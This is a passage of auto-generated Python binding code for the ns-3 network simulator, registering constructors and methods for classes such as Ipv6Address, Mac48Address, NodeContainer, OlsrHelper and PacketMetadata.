ns3::OutputStreamWrapper >', 'stream'), param('ns3::Time::Unit', 'unit', default_value='::ns3::Time::S')], is_static=True) ## ipv4-routing-helper.h (module 'internet'): static void ns3::Ipv4RoutingHelper::PrintRoutingTableAllEvery(ns3::Time printInterval, ns3::Ptr<ns3::OutputStreamWrapper> stream, ns3::Time::Unit unit=::ns3::Time::S) [member function] cls.add_method('PrintRoutingTableAllEvery', 'void', [param('ns3::Time', 'printInterval'), param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream'), param('ns3::Time::Unit', 'unit', default_value='::ns3::Time::S')], is_static=True) ## ipv4-routing-helper.h (module 'internet'): static void ns3::Ipv4RoutingHelper::PrintRoutingTableAt(ns3::Time printTime, ns3::Ptr<ns3::Node> node, ns3::Ptr<ns3::OutputStreamWrapper> stream, ns3::Time::Unit unit=::ns3::Time::S) [member function] cls.add_method('PrintRoutingTableAt', 'void', [param('ns3::Time', 'printTime'), param('ns3::Ptr< ns3::Node >', 'node'), param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream'), param('ns3::Time::Unit', 'unit', default_value='::ns3::Time::S')], is_static=True) ## ipv4-routing-helper.h (module 'internet'): static void ns3::Ipv4RoutingHelper::PrintRoutingTableEvery(ns3::Time printInterval, ns3::Ptr<ns3::Node> node, ns3::Ptr<ns3::OutputStreamWrapper> stream, ns3::Time::Unit unit=::ns3::Time::S) [member function] cls.add_method('PrintRoutingTableEvery', 'void', [param('ns3::Time', 'printInterval'), param('ns3::Ptr< ns3::Node >', 'node'), param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream'), param('ns3::Time::Unit', 'unit', default_value='::ns3::Time::S')], is_static=True) return def register_Ns3Ipv6Address_methods(root_module, cls): cls.add_binary_comparison_operator('<') cls.add_binary_comparison_operator('!=') cls.add_output_stream_operator() cls.add_binary_comparison_operator('==') ## ipv6-address.h (module 'network'): ns3::Ipv6Address::Ipv6Address() [constructor] cls.add_constructor([]) ## ipv6-address.h (module 'network'): ns3::Ipv6Address::Ipv6Address(char const * address) [constructor] cls.add_constructor([param('char const *', 'address')]) ## ipv6-address.h (module 'network'): ns3::Ipv6Address::Ipv6Address(uint8_t * address) [constructor] cls.add_constructor([param('uint8_t *', 'address')]) ## ipv6-address.h (module 'network'): ns3::Ipv6Address::Ipv6Address(ns3::Ipv6Address const & addr) [copy constructor] cls.add_constructor([param('ns3::Ipv6Address const &', 'addr')]) ## ipv6-address.h (module 'network'): ns3::Ipv6Address::Ipv6Address(ns3::Ipv6Address const * addr) [constructor] cls.add_constructor([param('ns3::Ipv6Address const *', 'addr')]) ## ipv6-address.h (module 'network'): ns3::Ipv6Address ns3::Ipv6Address::CombinePrefix(ns3::Ipv6Prefix const & prefix) [member function] cls.add_method('CombinePrefix', 'ns3::Ipv6Address', [param('ns3::Ipv6Prefix const &', 'prefix')]) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::ConvertFrom(ns3::Address const & address) [member function] cls.add_method('ConvertFrom', 'ns3::Ipv6Address', [param('ns3::Address const &', 'address')], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::Deserialize(uint8_t const * buf) [member function] cls.add_method('Deserialize', 'ns3::Ipv6Address', [param('uint8_t const *', 'buf')], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetAllHostsMulticast() [member function] cls.add_method('GetAllHostsMulticast', 'ns3::Ipv6Address', [], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetAllNodesMulticast() [member function] cls.add_method('GetAllNodesMulticast', 'ns3::Ipv6Address', [], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetAllRoutersMulticast() [member function] cls.add_method('GetAllRoutersMulticast', 'ns3::Ipv6Address', [], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetAny() [member function] cls.add_method('GetAny', 'ns3::Ipv6Address', [], is_static=True) ## ipv6-address.h (module 'network'): void ns3::Ipv6Address::GetBytes(uint8_t * buf) const [member function] cls.add_method('GetBytes', 'void', [param('uint8_t *', 'buf')], is_const=True) ## ipv6-address.h (module 'network'): ns3::Ipv4Address ns3::Ipv6Address::GetIpv4MappedAddress() const [member function] cls.add_method('GetIpv4MappedAddress', 'ns3::Ipv4Address', [], is_const=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetLoopback() [member function] cls.add_method('GetLoopback', 'ns3::Ipv6Address', [], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetOnes() [member function] cls.add_method('GetOnes', 'ns3::Ipv6Address', [], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetZero() [member function] cls.add_method('GetZero', 'ns3::Ipv6Address', [], is_static=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsAllHostsMulticast() const [member function] cls.add_method('IsAllHostsMulticast', 'bool', [], deprecated=True, is_const=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsAllNodesMulticast() const [member function] cls.add_method('IsAllNodesMulticast', 'bool', [], is_const=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsAllRoutersMulticast() const [member function] cls.add_method('IsAllRoutersMulticast', 'bool', [], is_const=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsAny() const [member function] cls.add_method('IsAny', 'bool', [], is_const=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsDocumentation() const [member function] cls.add_method('IsDocumentation', 'bool', [], is_const=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsEqual(ns3::Ipv6Address const & other) const [member function] cls.add_method('IsEqual', 'bool', [param('ns3::Ipv6Address const &', 'other')], is_const=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsIpv4MappedAddress() const [member function] cls.add_method('IsIpv4MappedAddress', 'bool', [], is_const=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsLinkLocal() const [member function] cls.add_method('IsLinkLocal', 'bool', [], is_const=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsLinkLocalMulticast() const [member function] cls.add_method('IsLinkLocalMulticast', 'bool', [], is_const=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsLocalhost() const [member function] cls.add_method('IsLocalhost', 'bool', [], is_const=True) ## ipv6-address.h (module 'network'): static bool ns3::Ipv6Address::IsMatchingType(ns3::Address const & address) [member function] cls.add_method('IsMatchingType', 'bool', [param('ns3::Address const &', 'address')], is_static=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsMulticast() const [member function] cls.add_method('IsMulticast', 'bool', [], is_const=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsSolicitedMulticast() const [member function] cls.add_method('IsSolicitedMulticast', 'bool', [], is_const=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeAutoconfiguredAddress(ns3::Mac16Address addr, ns3::Ipv6Address prefix) [member function] cls.add_method('MakeAutoconfiguredAddress', 'ns3::Ipv6Address', [param('ns3::Mac16Address', 'addr'), param('ns3::Ipv6Address', 'prefix')], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeAutoconfiguredAddress(ns3::Mac48Address addr, ns3::Ipv6Address prefix) [member function] cls.add_method('MakeAutoconfiguredAddress', 'ns3::Ipv6Address', [param('ns3::Mac48Address', 'addr'), param('ns3::Ipv6Address', 'prefix')], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeAutoconfiguredAddress(ns3::Mac64Address addr, ns3::Ipv6Address prefix) [member function] cls.add_method('MakeAutoconfiguredAddress', 'ns3::Ipv6Address', [param('ns3::Mac64Address', 'addr'), param('ns3::Ipv6Address', 'prefix')], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeAutoconfiguredLinkLocalAddress(ns3::Mac16Address mac) [member function] cls.add_method('MakeAutoconfiguredLinkLocalAddress', 'ns3::Ipv6Address', [param('ns3::Mac16Address', 'mac')], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeAutoconfiguredLinkLocalAddress(ns3::Mac48Address mac) [member function] cls.add_method('MakeAutoconfiguredLinkLocalAddress', 'ns3::Ipv6Address', [param('ns3::Mac48Address', 'mac')], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeAutoconfiguredLinkLocalAddress(ns3::Mac64Address mac) [member function] cls.add_method('MakeAutoconfiguredLinkLocalAddress', 'ns3::Ipv6Address', [param('ns3::Mac64Address', 'mac')], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeIpv4MappedAddress(ns3::Ipv4Address addr) [member function] cls.add_method('MakeIpv4MappedAddress', 'ns3::Ipv6Address', [param('ns3::Ipv4Address', 'addr')], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeSolicitedAddress(ns3::Ipv6Address addr) [member function] cls.add_method('MakeSolicitedAddress', 'ns3::Ipv6Address', [param('ns3::Ipv6Address', 'addr')], is_static=True) ## ipv6-address.h (module 'network'): void ns3::Ipv6Address::Print(std::ostream & os) const [member function] cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_const=True) ## ipv6-address.h (module 'network'): void ns3::Ipv6Address::Serialize(uint8_t * buf) const [member function] cls.add_method('Serialize', 'void', [param('uint8_t *', 'buf')], is_const=True) ## ipv6-address.h (module 'network'): void ns3::Ipv6Address::Set(char const * address) [member function] cls.add_method('Set', 'void', [param('char const *', 'address')]) ## ipv6-address.h (module 'network'): void ns3::Ipv6Address::Set(uint8_t * address) [member function] cls.add_method('Set', 'void', [param('uint8_t *', 'address')]) return def register_Ns3Ipv6Prefix_methods(root_module, cls): cls.add_binary_comparison_operator('!=') cls.add_output_stream_operator() cls.add_binary_comparison_operator('==') ## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix() [constructor] cls.add_constructor([]) ## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(uint8_t * prefix) [constructor] cls.add_constructor([param('uint8_t *', 'prefix')]) ## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(char const * prefix) [constructor] cls.add_constructor([param('char const *', 'prefix')]) ## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(uint8_t prefix) [constructor] cls.add_constructor([param('uint8_t', 'prefix')]) ## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(ns3::Ipv6Prefix const & prefix) [copy constructor] cls.add_constructor([param('ns3::Ipv6Prefix const &', 'prefix')]) ## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(ns3::Ipv6Prefix const * prefix) [constructor] cls.add_constructor([param('ns3::Ipv6Prefix const *', 'prefix')]) ## ipv6-address.h (module 'network'): void ns3::Ipv6Prefix::GetBytes(uint8_t * buf) const [member function] cls.add_method('GetBytes', 'void', [param('uint8_t *', 'buf')], is_const=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Prefix ns3::Ipv6Prefix::GetLoopback() [member function] cls.add_method('GetLoopback', 'ns3::Ipv6Prefix', [], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Prefix ns3::Ipv6Prefix::GetOnes() [member function] cls.add_method('GetOnes', 'ns3::Ipv6Prefix', [], is_static=True) ## ipv6-address.h (module 'network'): uint8_t ns3::Ipv6Prefix::GetPrefixLength() const [member function] cls.add_method('GetPrefixLength', 'uint8_t', [], is_const=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Prefix ns3::Ipv6Prefix::GetZero() [member function] cls.add_method('GetZero', 'ns3::Ipv6Prefix', [], is_static=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6Prefix::IsEqual(ns3::Ipv6Prefix const & other) const [member function] cls.add_method('IsEqual', 'bool', [param('ns3::Ipv6Prefix const &', 'other')], is_const=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6Prefix::IsMatch(ns3::Ipv6Address a, ns3::Ipv6Address b) const [member function] cls.add_method('IsMatch', 'bool', [param('ns3::Ipv6Address', 'a'), param('ns3::Ipv6Address', 'b')], is_const=True) ## ipv6-address.h (module 'network'): void ns3::Ipv6Prefix::Print(std::ostream & os) const [member function] cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_const=True) return def register_Ns3Mac48Address_methods(root_module, cls): cls.add_binary_comparison_operator('<') cls.add_binary_comparison_operator('!=') cls.add_output_stream_operator() cls.add_binary_comparison_operator('==') ## mac48-address.h (module 'network'): ns3::Mac48Address::Mac48Address(ns3::Mac48Address const & arg0) [copy constructor] cls.add_constructor([param('ns3::Mac48Address const &', 'arg0')]) ## mac48-address.h (module 'network'): ns3::Mac48Address::Mac48Address() [constructor] cls.add_constructor([]) ## mac48-address.h (module 'network'): ns3::Mac48Address::Mac48Address(char const * str) [constructor] cls.add_constructor([param('char const *', 'str')]) ## mac48-address.h (module 'network'): static ns3::Mac48Address ns3::Mac48Address::Allocate() [member function] cls.add_method('Allocate', 'ns3::Mac48Address', [], is_static=True) ## mac48-address.h (module 'network'): static ns3::Mac48Address ns3::Mac48Address::ConvertFrom(ns3::Address const & address) [member function] cls.add_method('ConvertFrom', 'ns3::Mac48Address', [param('ns3::Address const &', 'address')], is_static=True) ## mac48-address.h (module 'network'): void ns3::Mac48Address::CopyFrom(uint8_t const * buffer) [member function] cls.add_method('CopyFrom', 'void', [param('uint8_t const *', 'buffer')]) ## mac48-address.h (module 'network'): void ns3::Mac48Address::CopyTo(uint8_t * buffer) const [member function] cls.add_method('CopyTo', 'void', [param('uint8_t *', 'buffer')], is_const=True) ## mac48-address.h (module 'network'): static ns3::Mac48Address ns3::Mac48Address::GetBroadcast() [member function] cls.add_method('GetBroadcast', 'ns3::Mac48Address', [], is_static=True) ## mac48-address.h (module 'network'): static ns3::Mac48Address ns3::Mac48Address::GetMulticast(ns3::Ipv4Address address) [member function] cls.add_method('GetMulticast', 'ns3::Mac48Address', [param('ns3::Ipv4Address', 'address')], is_static=True) ## mac48-address.h (module 'network'): static ns3::Mac48Address ns3::Mac48Address::GetMulticast(ns3::Ipv6Address address) [member function] cls.add_method('GetMulticast', 'ns3::Mac48Address', [param('ns3::Ipv6Address', 'address')], is_static=True) ## mac48-address.h (module 'network'): static ns3::Mac48Address ns3::Mac48Address::GetMulticast6Prefix() [member function] cls.add_method('GetMulticast6Prefix', 'ns3::Mac48Address', [], is_static=True) ## mac48-address.h (module 'network'): static ns3::Mac48Address ns3::Mac48Address::GetMulticastPrefix() [member function] cls.add_method('GetMulticastPrefix', 'ns3::Mac48Address', [], is_static=True) ## mac48-address.h (module 'network'): bool ns3::Mac48Address::IsBroadcast() const [member function] cls.add_method('IsBroadcast', 'bool', [], is_const=True) ## mac48-address.h (module 'network'): bool ns3::Mac48Address::IsGroup() const [member function] cls.add_method('IsGroup', 'bool', [], is_const=True) ## mac48-address.h (module 'network'): static bool ns3::Mac48Address::IsMatchingType(ns3::Address const & address) [member function] cls.add_method('IsMatchingType', 'bool', [param('ns3::Address const &', 'address')], is_static=True) return def register_Ns3NodeContainer_methods(root_module, cls): ## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::NodeContainer const & arg0) [copy constructor] cls.add_constructor([param('ns3::NodeContainer const &', 'arg0')]) ## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer() [constructor] cls.add_constructor([]) ## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::Ptr<ns3::Node> node) [constructor] cls.add_constructor([param('ns3::Ptr< ns3::Node >', 'node')]) ## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(std::string nodeName) [constructor] cls.add_constructor([param('std::string', 'nodeName')]) ## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::NodeContainer const & a, ns3::NodeContainer const & b) [constructor] cls.add_constructor([param('ns3::NodeContainer const &', 'a'), param('ns3::NodeContainer const &', 'b')]) ## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::NodeContainer const & a, ns3::NodeContainer const & b, ns3::NodeContainer const & c) [constructor] cls.add_constructor([param('ns3::NodeContainer const &', 'a'), param('ns3::NodeContainer const &', 'b'), param('ns3::NodeContainer const &', 'c')]) ## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::NodeContainer const & a, ns3::NodeContainer const & b, ns3::NodeContainer const & c, ns3::NodeContainer const & d) [constructor] cls.add_constructor([param('ns3::NodeContainer const &', 'a'), param('ns3::NodeContainer const &', 'b'), param('ns3::NodeContainer const &', 'c'), param('ns3::NodeContainer const &', 'd')]) ## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::NodeContainer const & a, ns3::NodeContainer const & b, ns3::NodeContainer const & c, ns3::NodeContainer const & d, ns3::NodeContainer const & e) [constructor] cls.add_constructor([param('ns3::NodeContainer const &', 'a'), param('ns3::NodeContainer const &', 'b'), param('ns3::NodeContainer const &', 'c'), param('ns3::NodeContainer const &', 'd'), param('ns3::NodeContainer const &', 'e')]) ## node-container.h (module 'network'): void ns3::NodeContainer::Add(ns3::NodeContainer other) [member function] cls.add_method('Add', 'void', [param('ns3::NodeContainer', 'other')]) ## node-container.h (module 'network'): void ns3::NodeContainer::Add(ns3::Ptr<ns3::Node> node) [member function] cls.add_method('Add', 'void', [param('ns3::Ptr< ns3::Node >', 'node')]) ## node-container.h (module 'network'): void ns3::NodeContainer::Add(std::string nodeName) [member function] cls.add_method('Add', 'void', [param('std::string', 'nodeName')]) ## node-container.h (module 'network'): __gnu_cxx::__normal_iterator<const ns3::Ptr<ns3::Node>*,std::vector<ns3::Ptr<ns3::Node>, std::allocator<ns3::Ptr<ns3::Node> > > > ns3::NodeContainer::Begin() const [member function] cls.add_method('Begin', '__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::Node > const, std::vector< ns3::Ptr< ns3::Node > > >', [], is_const=True) ## node-container.h (module 'network'): void ns3::NodeContainer::Create(uint32_t n) [member function] cls.add_method('Create', 'void', [param('uint32_t', 'n')]) ## node-container.h (module 'network'): void ns3::NodeContainer::Create(uint32_t n, uint32_t systemId) [member function] cls.add_method('Create', 'void', [param('uint32_t', 'n'), param('uint32_t', 'systemId')]) ## node-container.h (module 'network'): __gnu_cxx::__normal_iterator<const ns3::Ptr<ns3::Node>*,std::vector<ns3::Ptr<ns3::Node>, std::allocator<ns3::Ptr<ns3::Node> > > > ns3::NodeContainer::End() const [member function] cls.add_method('End', '__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::Node > const, std::vector< ns3::Ptr< ns3::Node > > >', [], is_const=True) ## node-container.h (module 'network'): ns3::Ptr<ns3::Node> ns3::NodeContainer::Get(uint32_t i) const [member function] cls.add_method('Get', 'ns3::Ptr< ns3::Node >', [param('uint32_t', 'i')], is_const=True) ## node-container.h (module 'network'): static ns3::NodeContainer ns3::NodeContainer::GetGlobal() [member function] cls.add_method('GetGlobal', 'ns3::NodeContainer', [], is_static=True) ## node-container.h (module 'network'): uint32_t ns3::NodeContainer::GetN() const [member function] cls.add_method('GetN', 'uint32_t', [], is_const=True) return def register_Ns3NonCopyable_methods(root_module, cls): ## non-copyable.h (module 'core'): ns3::NonCopyable::NonCopyable() [constructor] cls.add_constructor([], visibility='protected') return def register_Ns3ObjectBase_methods(root_module, cls): ## object-base.h (module 'core'): ns3::ObjectBase::ObjectBase() [constructor] cls.add_constructor([]) ## object-base.h (module 'core'): ns3::ObjectBase::ObjectBase(ns3::ObjectBase const & arg0) [copy constructor] cls.add_constructor([param('ns3::ObjectBase const &', 'arg0')]) ## object-base.h (module 'core'): void ns3::ObjectBase::GetAttribute(std::string name, ns3::AttributeValue & value) const [member function] cls.add_method('GetAttribute', 'void', [param('std::string', 'name'), param('ns3::AttributeValue &', 'value')], is_const=True) ## object-base.h (module 'core'): bool ns3::ObjectBase::GetAttributeFailSafe(std::string name, ns3::AttributeValue & value) const [member function] cls.add_method('GetAttributeFailSafe', 'bool', [param('std::string', 'name'), param('ns3::AttributeValue &', 'value')], is_const=True) ## object-base.h (module 'core'): ns3::TypeId ns3::ObjectBase::GetInstanceTypeId() const [member function] cls.add_method('GetInstanceTypeId', 'ns3::TypeId', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## object-base.h (module 'core'): static ns3::TypeId ns3::ObjectBase::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## object-base.h (module 'core'): void ns3::ObjectBase::SetAttribute(std::string name, ns3::AttributeValue const & value) [member function] cls.add_method('SetAttribute', 'void', [param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')]) ## object-base.h (module 'core'): bool ns3::ObjectBase::SetAttributeFailSafe(std::string name, ns3::AttributeValue const & value) [member function] cls.add_method('SetAttributeFailSafe', 'bool', [param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')]) ## object-base.h (module 'core'): bool ns3::ObjectBase::TraceConnect(std::string name, std::string context, ns3::CallbackBase const & cb) [member function] cls.add_method('TraceConnect', 'bool', [param('std::string', 'name'), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')]) ## object-base.h (module 'core'): bool ns3::ObjectBase::TraceConnectWithoutContext(std::string name, ns3::CallbackBase const & cb) [member function] cls.add_method('TraceConnectWithoutContext', 'bool', [param('std::string', 'name'), param('ns3::CallbackBase const &', 'cb')]) ## object-base.h (module 'core'): bool ns3::ObjectBase::TraceDisconnect(std::string name, std::string context, ns3::CallbackBase const & cb) [member function] cls.add_method('TraceDisconnect', 'bool', [param('std::string', 'name'), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')]) ## object-base.h (module 'core'): bool ns3::ObjectBase::TraceDisconnectWithoutContext(std::string name, ns3::CallbackBase const & cb) [member function] cls.add_method('TraceDisconnectWithoutContext', 'bool', [param('std::string', 'name'), param('ns3::CallbackBase const &', 'cb')]) ## object-base.h (module 'core'): void ns3::ObjectBase::ConstructSelf(ns3::AttributeConstructionList const & attributes) [member function] cls.add_method('ConstructSelf', 'void', [param('ns3::AttributeConstructionList const &', 'attributes')], visibility='protected') ## object-base.h (module 'core'): void ns3::ObjectBase::NotifyConstructionCompleted() [member function] cls.add_method('NotifyConstructionCompleted', 'void', [], visibility='protected', is_virtual=True) return def register_Ns3ObjectDeleter_methods(root_module, cls): ## object.h (module 'core'): ns3::ObjectDeleter::ObjectDeleter() [constructor] cls.add_constructor([]) ## object.h (module 'core'): ns3::ObjectDeleter::ObjectDeleter(ns3::ObjectDeleter const & arg0) [copy constructor] cls.add_constructor([param('ns3::ObjectDeleter const &', 'arg0')]) ## object.h (module 'core'): static void ns3::ObjectDeleter::Delete(ns3::Object * object) [member function] cls.add_method('Delete', 'void', [param('ns3::Object *', 'object')], is_static=True) return def register_Ns3ObjectFactory_methods(root_module, cls): cls.add_output_stream_operator() ## object-factory.h (module 'core'): ns3::ObjectFactory::ObjectFactory(ns3::ObjectFactory const & arg0) [copy constructor] cls.add_constructor([param('ns3::ObjectFactory const &', 'arg0')]) ## object-factory.h (module 'core'): ns3::ObjectFactory::ObjectFactory() [constructor] cls.add_constructor([]) ## object-factory.h (module 'core'): ns3::ObjectFactory::ObjectFactory(std::string typeId) [constructor] cls.add_constructor([param('std::string', 'typeId')]) ## object-factory.h (module 'core'): ns3::Ptr<ns3::Object> ns3::ObjectFactory::Create() const [member function] cls.add_method('Create', 'ns3::Ptr< ns3::Object >', [], is_const=True) ## object-factory.h (module 'core'): ns3::TypeId ns3::ObjectFactory::GetTypeId() const [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_const=True) ## object-factory.h (module 'core'): void ns3::ObjectFactory::Set(std::string name, ns3::AttributeValue const & value) [member function] cls.add_method('Set', 'void', [param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')]) ## object-factory.h (module 'core'): void ns3::ObjectFactory::SetTypeId(ns3::TypeId tid) [member function] cls.add_method('SetTypeId', 'void', [param('ns3::TypeId', 'tid')]) ## object-factory.h (module 'core'): void ns3::ObjectFactory::SetTypeId(char const * tid) [member function] cls.add_method('SetTypeId', 'void', [param('char const *', 'tid')]) ## object-factory.h (module 'core'): void ns3::ObjectFactory::SetTypeId(std::string tid) [member function] cls.add_method('SetTypeId', 'void', [param('std::string', 'tid')]) return def register_Ns3OlsrHelper_methods(root_module, cls): ## olsr-helper.h (module 'olsr'): ns3::OlsrHelper::OlsrHelper() [constructor] cls.add_constructor([]) ## olsr-helper.h (module 'olsr'): ns3::OlsrHelper::OlsrHelper(ns3::OlsrHelper const & arg0) [copy constructor] cls.add_constructor([param('ns3::OlsrHelper const &', 'arg0')]) ## olsr-helper.h (module 'olsr'): ns3::OlsrHelper * ns3::OlsrHelper::Copy() const [member function] cls.add_method('Copy', 'ns3::OlsrHelper *', [], is_const=True, is_virtual=True) ## olsr-helper.h (module 'olsr'): void ns3::OlsrHelper::ExcludeInterface(ns3::Ptr<ns3::Node> node, uint32_t interface) [member function] cls.add_method('ExcludeInterface', 'void', [param('ns3::Ptr< ns3::Node >', 'node'), param('uint32_t', 'interface')]) ## olsr-helper.h (module 'olsr'): ns3::Ptr<ns3::Ipv4RoutingProtocol> ns3::OlsrHelper::Create(ns3::Ptr<ns3::Node> node) const [member function] cls.add_method('Create', 'ns3::Ptr< ns3::Ipv4RoutingProtocol >', [param('ns3::Ptr< ns3::Node >', 'node')], is_const=True, is_virtual=True) ## olsr-helper.h (module 'olsr'): void ns3::OlsrHelper::Set(std::string name, ns3::AttributeValue const & value) [member function] cls.add_method('Set', 'void', [param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')]) ## olsr-helper.h (module 'olsr'): int64_t ns3::OlsrHelper::AssignStreams(ns3::NodeContainer c, int64_t stream) [member function] cls.add_method('AssignStreams', 'int64_t', [param('ns3::NodeContainer', 'c'), param('int64_t', 'stream')]) return def register_Ns3PacketMetadata_methods(root_module, cls): ## packet-metadata.h (module 'network'): ns3::PacketMetadata::PacketMetadata(uint64_t uid, uint32_t size) [constructor] cls.add_constructor([param('uint64_t', 'uid'), param('uint32_t', 'size')]) ## packet-metadata.h (module 'network'): ns3::PacketMetadata::PacketMetadata(ns3::PacketMetadata const & o) [copy constructor] cls.add_constructor([param('ns3::PacketMetadata const &', 'o')]) ## packet-metadata.h (module 'network'): void ns3::PacketMetadata::AddAtEnd(ns3::PacketMetadata const & o) [member function] cls.add_method('AddAtEnd', 'void', [param('ns3::PacketMetadata const &', 'o')]) ## packet-metadata.h (module 'network'): void ns3::PacketMetadata::AddHeader(ns3::Header const & header, uint32_t size) [member function] cls.add_method('AddHeader', 'void', [param('ns3::Header const &', 'header'), param('uint32_t', 'size')]) ## packet-metadata.h (module 'network'): void ns3::PacketMetadata::AddPaddingAtEnd(uint32_t end) [member function] cls.add_method('AddPaddingAtEnd', 'void', [param('uint32_t', 'end')]) ## packet-metadata.h (module 'network'): void ns3::PacketMetadata::AddTrailer(ns3::Trailer const & trailer, uint32_t size) [member function] cls.add_method('AddTrailer', 'void', [param('ns3::Trailer const &', 'trailer'), param('uint32_t', 'size')]) ## packet-metadata.h (module 'network'): ns3::PacketMetadata::ItemIterator ns3::PacketMetadata::BeginItem(ns3::Buffer buffer) const [member function] cls.add_method('BeginItem', 'ns3::PacketMetadata::ItemIterator', [param('ns3::Buffer', 'buffer')], is_const=True) ## packet-metadata.h (module 'network'): ns3::PacketMetadata ns3::PacketMetadata::CreateFragment(uint32_t start, uint32_t end) const [member function] cls.add_method('CreateFragment', 'ns3::PacketMetadata', [param('uint32_t', 'start'), param('uint32_t', 'end')], is_const=True) ## packet-metadata.h (module 'network'): uint32_t ns3::PacketMetadata::Deserialize(uint8_t const * buffer, uint32_t size) [member function] cls.add_method('Deserialize', 'uint32_t', [param('uint8_t const *', 'buffer'), param('uint32_t', 'size')]) ## packet-metadata.h (module 'network'): static void ns3::PacketMetadata::Enable() [member function] cls.add_method('Enable', 'void', [], is_static=True) ## packet-metadata.h (module 'network'): static void ns3::PacketMetadata::EnableChecking() [member function] cls.add_method('EnableChecking', 'void', [], is_static=True) ## packet-metadata.h (module 'network'): uint32_t ns3::PacketMetadata::GetSerializedSize() const [member function] cls.add_method('GetSerializedSize', 'uint32_t', [], is_const=True) ## packet-metadata.h (module 'network'): uint64_t ns3::PacketMetadata::GetUid() const [member function] cls.add_method('GetUid', 'uint64_t', [], is_const=True) ## packet-metadata.h (module 'network'): void ns3::PacketMetadata::RemoveAtEnd(uint32_t end) [member function] cls.add_method('RemoveAtEnd', 'void', [param('uint32_t', 'end')]) ## packet-metadata.h (module 'network'): void ns3::PacketMetadata::RemoveAtStart(uint32_t start) [member function] cls.add_method('RemoveAtStart', 'void', [param('uint32_t', 'start')]) ## packet-metadata.h (module 'network'): void ns3::PacketMetadata::RemoveHeader(ns3::Header const & header, uint32_t size) [member function] cls.add_method('RemoveHeader', 'void', [param('ns3::Header const &', 'header'), param('uint32_t', 'size')]) ## packet-metadata.h (module 'network'): void ns3::PacketMetadata::RemoveTrailer(ns3::Trailer const & trailer, uint32_t size) [member function] cls.add_method('RemoveTrailer', 'void', [param('ns3::Trailer const &', 'trailer'), param('uint32_t', 'size')]) ## packet-metadata.h (module 'network'): uint32_t ns3::PacketMetadata::Serialize(uint8_t * buffer, uint32_t maxSize) const [member function] cls.add_method('Serialize', 'uint32_t', [param('uint8_t *', 'buffer'), 